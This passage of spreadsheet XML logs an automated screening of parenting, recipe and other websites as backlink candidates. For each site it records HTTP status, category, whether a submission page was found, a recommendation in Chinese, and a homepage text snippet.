      <x:c r="A433" s="18" t="str">
        <x:v>432</x:v>
      </x:c>
      <x:c r="B433" s="19" t="str">
        <x:v>raisedonreadalouds.com</x:v>
      </x:c>
      <x:c r="C433" s="19" t="str">
        <x:v>https://raisedonreadalouds.com</x:v>
      </x:c>
      <x:c r="D433" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E433" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F433" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G433" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H433" s="19" t="str">
        <x:v>https://raisedonreadalouds.com/</x:v>
      </x:c>
      <x:c r="I433" s="19" t="str">
        <x:v>Home - Raised On Read-Alouds</x:v>
      </x:c>
      <x:c r="J433" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K433" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L433" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M433" s="19" t="str">
        <x:v>https://raisedonreadalouds.com/</x:v>
      </x:c>
      <x:c r="N433" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O433" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P433" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q433" s="21" t="str">
        <x:v>Home - Raised On Read-Alouds Top Raised On Read-Alouds creating book lovers, one story at a time About About The ABCs of Motherhood Privacy Policy &amp; Disclosure Motherhood + Home Pregnancy + Postpartum Meal Ideas Activities Books Holidays + Seasonal Holidays + seasonal Grab Your FREE December Christmas Read-Aloud Calendar Grab Your FREE July Nature Calendar and Booklist Grab Your FREE June Nature Calendar and Booklist Grab Your FREE May Nature Calendar and Booklist Grab Your FREE April Nature Calendar and Booklist Grab Your FREE March Nature Calendar and Booklist More Posts Activities Grab Your FREE December Christmas Read-Aloud Calendar Grab Your FREE July Nature Calendar and Booklist Grab Y</x:v>
      </x:c>
      <x:c r="R433" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S433" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T433" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://raisedonreadalouds.com</x:v>
      </x:c>
    </x:row>
    <x:row r="434">
      <x:c r="A434" s="18" t="str">
        <x:v>433</x:v>
      </x:c>
      <x:c r="B434" s="19" t="str">
        <x:v>seniorlivingmedia.com</x:v>
      </x:c>
      <x:c r="C434" s="19" t="str">
        <x:v>https://seniorlivingmedia.com</x:v>
      </x:c>
      <x:c r="D434" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E434" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F434" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G434" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H434" s="19" t="str">
        <x:v>https://activities.seniorlivingmedia.com/</x:v>
      </x:c>
      <x:c r="I434" s="19" t="str">
        <x:v>Senior Living Media</x:v>
      </x:c>
      <x:c r="J434" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K434" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L434" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M434" s="19" t="str">
        <x:v>https://activities.seniorlivingmedia.com/</x:v>
      </x:c>
      <x:c r="N434" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O434" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P434" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q434" s="21" t="str">
        <x:v>Senior Living Media Toggle Navigation Home My Account Senior Living Activity Assistant Login Check what we have Are you a Resident Activity Professional working in Senior Communities? This place is for YOU! We have thousands of activity ideas, and printable games, activities, resources, decorations, and more – all to make your job easier! Just keep scrolling down to see what we have to offer! Activity Ideas Discover endless activity ideas, from crosswords and printable coloring pages to fun puzzles and more! Resources Explore a variety of resources to help seniors stay engaged and active, including guides on finding crosswords, printable coloring pages, puzzles, and other enjoyable activitie</x:v>
      </x:c>
      <x:c r="R434" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S434" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T434" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://seniorlivingmedia.com</x:v>
      </x:c>
    </x:row>
    <x:row r="435">
      <x:c r="A435" s="18" t="str">
        <x:v>434</x:v>
      </x:c>
      <x:c r="B435" s="19" t="str">
        <x:v>modernmomlife.com</x:v>
      </x:c>
      <x:c r="C435" s="19" t="str">
        <x:v>https://modernmomlife.com</x:v>
      </x:c>
      <x:c r="D435" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E435" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F435" s="20"/>
      <x:c r="G435" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H435" s="19" t="str"/>
      <x:c r="I435" s="19" t="str"/>
      <x:c r="J435" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K435" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L435" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M435" s="19" t="str">
        <x:v>https://modernmomlife.com</x:v>
      </x:c>
      <x:c r="N435" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O435" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P435" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q435" s="21" t="str"/>
      <x:c r="R435" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S435" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T435" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://modernmomlife.com
http://modernmomlife.com</x:v>
      </x:c>
    </x:row>
    <x:row r="436">
      <x:c r="A436" s="18" t="str">
        <x:v>435</x:v>
      </x:c>
      <x:c r="B436" s="19" t="str">
        <x:v>themommyhoodclub.com</x:v>
      </x:c>
      <x:c r="C436" s="19" t="str">
        <x:v>https://themommyhoodclub.com</x:v>
      </x:c>
      <x:c r="D436" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E436" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F436" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G436" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H436" s="19" t="str">
        <x:v>https://themommyhoodclub.com/</x:v>
      </x:c>
      <x:c r="I436" s="19" t="str">
        <x:v>The Mommyhood Club | From Pregnancy To Mommyhood</x:v>
      </x:c>
      <x:c r="J436" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K436" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L436" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M436" s="19" t="str">
        <x:v>https://themommyhoodclub.com/</x:v>
      </x:c>
      <x:c r="N436" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O436" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P436" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q436" s="21" t="str">
        <x:v>The Mommyhood Club | From Pregnancy To Mommyhood Skip to content Trending Post : 30 Delicious Avocado Recipes Baby Life Baby Name Ideas Breastfeeding Labor &amp; Birth Postpartum Pregnancy Mom Life Crafts &amp; Activities Easy Food Ideas Appetizers Dinner Snacks Treats Holidays Party Food Crafts Shop Baby Name Ideas Holiday Treats Food ideas For Families Food ideas For Parties Holiday Food Valentine&amp;rsquo;s Day Christmas Game Day Easter Easy Appetizers St. Patrick&amp;rsquo;s Day Gift Guides See All &gt; No posts Recent Posts See All &gt; 100 Unique Baby Names 100 Meaningful Baby Names 105 Rare Baby Names 100 Spanish Girl Names That Work In English And Spanish Reader Favorites Fun Green Leprechaun Dip Pizza T</x:v>
      </x:c>
      <x:c r="R436" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S436" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T436" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://themommyhoodclub.com</x:v>
      </x:c>
    </x:row>
    <x:row r="437">
      <x:c r="A437" s="18" t="str">
        <x:v>436</x:v>
      </x:c>
      <x:c r="B437" s="19" t="str">
        <x:v>janeskitchenmiracles.com</x:v>
      </x:c>
      <x:c r="C437" s="19" t="str">
        <x:v>https://janeskitchenmiracles.com</x:v>
      </x:c>
      <x:c r="D437" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E437" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F437" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G437" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H437" s="19" t="str">
        <x:v>https://janeskitchenmiracles.com/</x:v>
      </x:c>
      <x:c r="I437" s="19" t="str">
        <x:v>Jane's Kitchen: Real Chef Recipes for Foodies</x:v>
      </x:c>
      <x:c r="J437" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K437" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L437" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M437" s="19" t="str">
        <x:v>https://janeskitchenmiracles.com/</x:v>
      </x:c>
      <x:c r="N437" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O437" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P437" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q437" s="21" t="str">
        <x:v>Browse some of the best quick and easy recipes for what to eat. Dinner ideas that you're family will love are just a click away! Jane's Kitchen: Real Chef Recipes for Foodies Skip to Content Search Search for: Close Search &amp;times; Home Recipes Side Dishes Sauces Food Toppers Seasonings Appetizers Leftovers Jane’s Blog Cooking Tips Essential Oils Gear Guides Small Appliances Large Appliances Cookware &amp; Bakeware Commercial Kitchen Accessories &amp; Tools BBQ Home Brewing &amp; Wine Contact Us About Who Are We? Contact Us Privacy Policy Terms &amp; Conditions Disclaimer Joanna Gaines Buttercream Frosting Recipe This buttercream frosting is silky, sweet, and exactly what you need to ... Read More Bobby Flay Peach Sangria Recipe This peach sangria is what summer in a glass looks like when ... Read More Bobby Flay Slaw Fish Tacos Recip</x:v>
      </x:c>
      <x:c r="R437" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S437" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T437" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://janeskitchenmiracles.com</x:v>
      </x:c>
    </x:row>
    <x:row r="438">
      <x:c r="A438" s="18" t="str">
        <x:v>437</x:v>
      </x:c>
      <x:c r="B438" s="19" t="str">
        <x:v>13.126.73.67</x:v>
      </x:c>
      <x:c r="C438" s="19" t="str">
        <x:v>https://13.126.73.67</x:v>
      </x:c>
      <x:c r="D438" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E438" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F438" s="20"/>
      <x:c r="G438" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H438" s="19" t="str"/>
      <x:c r="I438" s="19" t="str"/>
      <x:c r="J438" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K438" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L438" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M438" s="19" t="str">
        <x:v>https://13.126.73.67</x:v>
      </x:c>
      <x:c r="N438" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O438" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P438" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q438" s="21" t="str"/>
      <x:c r="R438" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S438" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T438" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://13.126.73.67
http://13.126.73.67</x:v>
      </x:c>
    </x:row>
    <x:row r="439">
      <x:c r="A439" s="18" t="str">
        <x:v>438</x:v>
      </x:c>
      <x:c r="B439" s="19" t="str">
        <x:v>cedbi.org</x:v>
      </x:c>
      <x:c r="C439" s="19" t="str">
        <x:v>https://cedbi.org</x:v>
      </x:c>
      <x:c r="D439" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E439" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F439" s="20" t="str">
        <x:v>500</x:v>
      </x:c>
      <x:c r="G439" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H439" s="19" t="str">
        <x:v>http://cedbi.org/</x:v>
      </x:c>
      <x:c r="I439" s="19" t="str">
        <x:v>Database Error</x:v>
      </x:c>
      <x:c r="J439" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K439" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L439" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M439" s="19" t="str">
        <x:v>http://cedbi.org/</x:v>
      </x:c>
      <x:c r="N439" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O439" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P439" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q439" s="21" t="str">
        <x:v>Database Error Error establishing a database connection</x:v>
      </x:c>
      <x:c r="R439" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S439" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T439" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://cedbi.org
http://cedbi.org</x:v>
      </x:c>
    </x:row>
    <x:row r="440">
      <x:c r="A440" s="18" t="str">
        <x:v>439</x:v>
      </x:c>
      <x:c r="B440" s="19" t="str">
        <x:v>allgoodschools.com</x:v>
      </x:c>
      <x:c r="C440" s="19" t="str">
        <x:v>https://allgoodschools.com</x:v>
      </x:c>
      <x:c r="D440" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E440" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F440" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G440" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H440" s="19" t="str">
        <x:v>https://allgoodschools.com/</x:v>
      </x:c>
      <x:c r="I440" s="19" t="str">
        <x:v>Welcome | AllGoodSchools</x:v>
      </x:c>
      <x:c r="J440" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K440" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L440" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M440" s="19" t="str">
        <x:v>https://allgoodschools.com/</x:v>
      </x:c>
      <x:c r="N440" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O440" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P440" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q440" s="21" t="str">
        <x:v>Discover excellence in education with www.allgoodschools.com! Your gateway to a world of educational resources, we bring you a comprehensive platform dedicated to connecting students, parents, and educators with top-tier schools and learning opportunities. Explore in-depth profiles, insightful articles, and the latest trends in education. Whether you're seeking the perfect school for your child, valuable insights for effective teaching, or staying informed about educational advancements, All Goo Welcome | AllGoodSchools Home Blog Tips Parenting Students Schools Teachers Trainings Career Shop Write For Us Tips Typing Game Funny Lessons 365 Days of Parenting Search Home Blog Tips Parenting Students Schools Teachers Trainings Career Shop Write For Us Tips Typing Game Funny Lessons 365 Days of Parenting Search Search Search Blog Tips Parenting Students Schools Teachers Trainings Career Shop Write For Us Tips Typing Game Copyright 2021 - All Right Reserved Blog Extracurricular Activities Parenting Tips Kids Exercise Duration Calculator – Kids Fitness Blog Opinions Parenting Schools Tips Download 32 Points School Ranking Checklist Artificial Intelligence Blog Parenting Tips AI in Parentin</x:v>
      </x:c>
      <x:c r="R440" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S440" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T440" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://allgoodschools.com</x:v>
      </x:c>
    </x:row>
    <x:row r="441">
      <x:c r="A441" s="18" t="str">
        <x:v>440</x:v>
      </x:c>
      <x:c r="B441" s="19" t="str">
        <x:v>mamaoffive.com</x:v>
      </x:c>
      <x:c r="C441" s="19" t="str">
        <x:v>https://mamaoffive.com</x:v>
      </x:c>
      <x:c r="D441" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E441" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F441" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G441" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H441" s="19" t="str">
        <x:v>https://www.mamaoffive.com/</x:v>
      </x:c>
      <x:c r="I441" s="19" t="str">
        <x:v>Mama of Five - Mama of Five</x:v>
      </x:c>
      <x:c r="J441" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K441" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L441" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M441" s="19" t="str">
        <x:v>https://www.mamaoffive.com/</x:v>
      </x:c>
      <x:c r="N441" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O441" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P441" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q441" s="21" t="str">
        <x:v>Browse all our Recipe Ideas to make your next meal Mama of Five - Mama of Five Skip to content Most Read : 14 of the Biggest Breast Pumping Mistakes? Home About Contact Desserts Easy Meals Kids Crafts Holiday Favorite Recipe : Gluten-Free Carrot Cake Mama of Five The Best Easter Recipes Desserts Easy Meals Kids Crafts More Crafts Catch ‘Em All in Color: FREE Printable Pokemon Coloring Pages Easy TP Roll Fairy House Craft Kids Will Love Free Papercraft Spaceship Printable FREE Jellyfish Craft Free Fun Robot Papercraft for Energetic Kids Easter Recipes More Desserts Easy Easter Cakes Cake Pops and Cake Balls for Parties Bite-Sized Pink Desserts for Parties Farm Animal Coloring Pages Summer Dip Recipes for BBQs &amp; Parties What’s for dinner? Brow</x:v>
      </x:c>
      <x:c r="R441" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S441" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T441" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mamaoffive.com</x:v>
      </x:c>
    </x:row>
    <x:row r="442">
      <x:c r="A442" s="18" t="str">
        <x:v>441</x:v>
      </x:c>
      <x:c r="B442" s="19" t="str">
        <x:v>lovefreebie.com</x:v>
      </x:c>
      <x:c r="C442" s="19" t="str">
        <x:v>https://lovefreebie.com</x:v>
      </x:c>
      <x:c r="D442" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E442" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F442" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G442" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H442" s="19" t="str">
        <x:v>https://lovefreebie.com/</x:v>
      </x:c>
      <x:c r="I442" s="19" t="str">
        <x:v>Freebies September 2026 | Love Freebie</x:v>
      </x:c>
      <x:c r="J442" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K442" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L442" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M442" s="19" t="str">
        <x:v>https://lovefreebie.com/</x:v>
      </x:c>
      <x:c r="N442" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O442" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P442" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q442" s="21" t="str">
        <x:v>Freebies September 2026 | Love Freebie Home Freebie Blog Free Samples Free Stuff Free Coupons Freebies US Freebies UK Love Freebie = Free Samples by MAIL &amp; Free Stuff September 2026 Free Mini Cookies Variety Pack Or TUMS Chewy Bites Pouch Freebies US For Sams Club members, a quick free sample opportunity is available. Through the Freeosk program, select locations are handing out either mini cookies or TUMS chewy bites. It's a zero-risk way to try either product. The process is simple but has specific steps. First, always verify availability by checking the Freeosk locator for your specific club. Then, head in with your physical or digital membership … Company/Brand: Freeosk Inc. Get FREE Fre</x:v>
      </x:c>
      <x:c r="R442" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S442" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T442" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://lovefreebie.com</x:v>
      </x:c>
    </x:row>
    <x:row r="443">
      <x:c r="A443" s="18" t="str">
        <x:v>442</x:v>
      </x:c>
      <x:c r="B443" s="19" t="str">
        <x:v>lifehacker.com</x:v>
      </x:c>
      <x:c r="C443" s="19" t="str">
        <x:v>https://lifehacker.com</x:v>
      </x:c>
      <x:c r="D443" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E443" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F443" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G443" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H443" s="19" t="str">
        <x:v>https://lifehacker.com/</x:v>
      </x:c>
      <x:c r="I443" s="19" t="str">
        <x:v>Lifehacker | Do everything better</x:v>
      </x:c>
      <x:c r="J443" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K443" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L443" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M443" s="19" t="str">
        <x:v>https://lifehacker.com/</x:v>
      </x:c>
      <x:c r="N443" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O443" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P443" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q443" s="21" t="str">
        <x:v>Lifehacker is the ultimate authority on optimizing every aspect of your life. Do everything better. Lifehacker | Do everything better Skip to Main Content View our Bluesky Page (Opens in a new tab) View our Instagram Page (Opens in a new tab) View on Facebook Page (Opens in a new tab) View our Youtube Page (Opens in a new tab) View our Twitter Page (Opens in a new tab) $refs.firstMenuItem.focus());"&gt; Latest Tech Best Picks Entertainment Health Reviews Home &amp; Garden Deals Comparisons Hacks query=evt.target.value' x-on:keyup="onKeyUp" x-on:keydown="onKeyDown" @click="onKeyUp" @click.outside="results={}" placeholder="Search Lifehacker" /&gt; 0"&gt; Search Result Latest Tech AI TVs Hardware Software Mobile Apps Privacy All Tech Best Picks Best VPN to Watch Porn Best Paid VPN Best Smartwatches Best F</x:v>
      </x:c>
      <x:c r="R443" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S443" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T443" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://lifehacker.com</x:v>
      </x:c>
    </x:row>
    <x:row r="444">
      <x:c r="A444" s="18" t="str">
        <x:v>443</x:v>
      </x:c>
      <x:c r="B444" s="19" t="str">
        <x:v>jakobwilmer.com</x:v>
      </x:c>
      <x:c r="C444" s="19" t="str">
        <x:v>https://jakobwilmer.com</x:v>
      </x:c>
      <x:c r="D444" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E444" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F444" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G444" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H444" s="19" t="str">
        <x:v>https://jakobwilmer.com/</x:v>
      </x:c>
      <x:c r="I444" s="19" t="str">
        <x:v>Jakob Wilmer -</x:v>
      </x:c>
      <x:c r="J444" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K444" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L444" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M444" s="19" t="str">
        <x:v>https://jakobwilmer.com/</x:v>
      </x:c>
      <x:c r="N444" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O444" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P444" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q444" s="21" t="str">
        <x:v>Jakob Wilmer - Jakob Wilmer Mindblown: a blog about philosophy. Got any book recommendations? Get In Touch Jakob Wilmer Proudly powered by WordPress</x:v>
      </x:c>
      <x:c r="R444" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S444" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T444" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://jakobwilmer.com</x:v>
      </x:c>
    </x:row>
    <x:row r="445">
      <x:c r="A445" s="18" t="str">
        <x:v>444</x:v>
      </x:c>
      <x:c r="B445" s="19" t="str">
        <x:v>pea88.com</x:v>
      </x:c>
      <x:c r="C445" s="19" t="str">
        <x:v>https://pea88.com</x:v>
      </x:c>
      <x:c r="D445" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E445" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F445" s="20"/>
      <x:c r="G445" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H445" s="19" t="str"/>
      <x:c r="I445" s="19" t="str"/>
      <x:c r="J445" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K445" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L445" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M445" s="19" t="str">
        <x:v>https://pea88.com</x:v>
      </x:c>
      <x:c r="N445" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O445" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P445" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q445" s="21" t="str"/>
      <x:c r="R445" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S445" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T445" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://pea88.com
http://pea88.com</x:v>
      </x:c>
    </x:row>
    <x:row r="446">
      <x:c r="A446" s="18" t="str">
        <x:v>445</x:v>
      </x:c>
      <x:c r="B446" s="19" t="str">
        <x:v>listlunatic.com</x:v>
      </x:c>
      <x:c r="C446" s="19" t="str">
        <x:v>https://listlunatic.com</x:v>
      </x:c>
      <x:c r="D446" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E446" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F446" s="20" t="str">
        <x:v>200</x:v>
